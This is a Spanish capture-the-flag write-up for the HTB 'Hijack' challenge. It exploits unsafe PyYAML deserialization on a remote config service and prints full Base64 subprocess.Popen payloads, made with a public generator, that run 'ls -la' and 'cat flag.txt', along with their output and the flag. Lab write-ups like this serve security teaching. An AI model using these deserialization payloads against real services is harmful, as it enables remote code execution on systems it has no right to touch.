<- HTB CYBER APOCALYPSE

Hijack

3 minutos de lectura

Se nos proporciona una instancia remota a la que conectarnos:

$ nc 167.71.143.44 31614  

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
>

Reconocimiento básico

Tenemos dos opciones. Usando la primera, podemos establecer una configuración y la salida es una cadena codificada en Base64:

$ nc 165.232.100.46 31251

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 1

- Creating new config -
Temperature units (F/C/K): C
Propulsion Components Target Temperature : 13
Solar Array Target Temperature : 37
Infrared Spectrometers Target Temperature : 0
Auto Calibration (ON/OFF) : ON

Serialized config: ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo=  
Uploading to ship...

Si decodificamos esta cadena, veremos que es un objeto serializado:

$ echo ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo= | base64 -d
!!python/object:__main__.Config {IR_spectrometer_temp: '0', auto_calibration: 'ON',
  propulsion_temp: '13', solar_array_temp: '37', units: C}

$ echo ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo= | base64 -d | xxd  
00000000: 2121 7079 7468 6f6e 2f6f 626a 6563 743a  !!python/object:
00000010: 5f5f 6d61 696e 5f5f 2e43 6f6e 6669 6720  __main__.Config
00000020: 7b49 525f 7370 6563 7472 6f6d 6574 6572  {IR_spectrometer
00000030: 5f74 656d 703a 2027 3027 2c20 6175 746f  _temp: '0', auto
00000040: 5f63 616c 6962 7261 7469 6f6e 3a20 274f  _calibration: 'O
00000050: 4e27 2c0a 2020 7072 6f70 756c 7369 6f6e  N',.  propulsion
00000060: 5f74 656d 703a 2027 3133 272c 2073 6f6c  _temp: '13', sol
00000070: 6172 5f61 7272 6179 5f74 656d 703a 2027  ar_array_temp: '
00000080: 3337 272c 2075 6e69 7473 3a20 437d 0a    37', units: C}.

Además, si buscamos un poco, identificaremos que el tipo de serialización es YAML.

Ataque de deserialización

Se sabe que PyYAML es inseguro si deserializa datos no confiables, que debe ser la opción 2.

Hay un proyecto público llamado python-deserialization-attack-payload-generator que nos permite generar payloads para explotar vulnerabilidades de deserialización insegura en Python (más información en HackTricks):

$ cd python-deserialization-attack-payload-generator

$ python3 peas.py
Enter RCE command :ls -la
Enter operating system of target [linux/windows] . Default is linux :
Want to base64 encode payload ? [N/y] :y
Enter File location and name to save :./payload
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :PyYAML
Done Saving file !!!!

$ cat payload_yaml
ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gbHMKICAtIC1sYQo=

Vamos a probar:

$ nc 165.232.100.46 31251

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 2

Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gbHMKICAtIC1sYQo=  
** Success **
Uploading to ship...

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> total 20
drwxr-sr-x    1 ctf      ctf           4096 Mar 10 20:10 .
drwxr-xr-x    1 root     root          4096 Mar 10 20:10 ..
-rw-rw-r--    1 root     root          1583 Mar 10 20:08 chall.py
-rw-rw-r--    1 root     root            49 Mar 10 20:08 flag.txt
-rwxrwxr-x    1 root     root          1583 Mar 10 20:08 hijack.py

Genial!

Flag

Vamos a por la flag:

$ python3 peas.py
Enter RCE command :cat flag.txt
Enter operating system of target [linux/windows] . Default is linux :
Want to base64 encode payload ? [N/y] :y
Enter File location and name to save :payload
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :PyYAML
Done Saving file !!!!

$ cat payload_yaml
ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gY2F0CiAgLSBmbGFnLnR4dAo=

$ nc 165.232.100.46 31251

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 2

Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gY2F0CiAgLSBmbGFnLnR4dAo=  
** Success **
Uploading to ship...

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}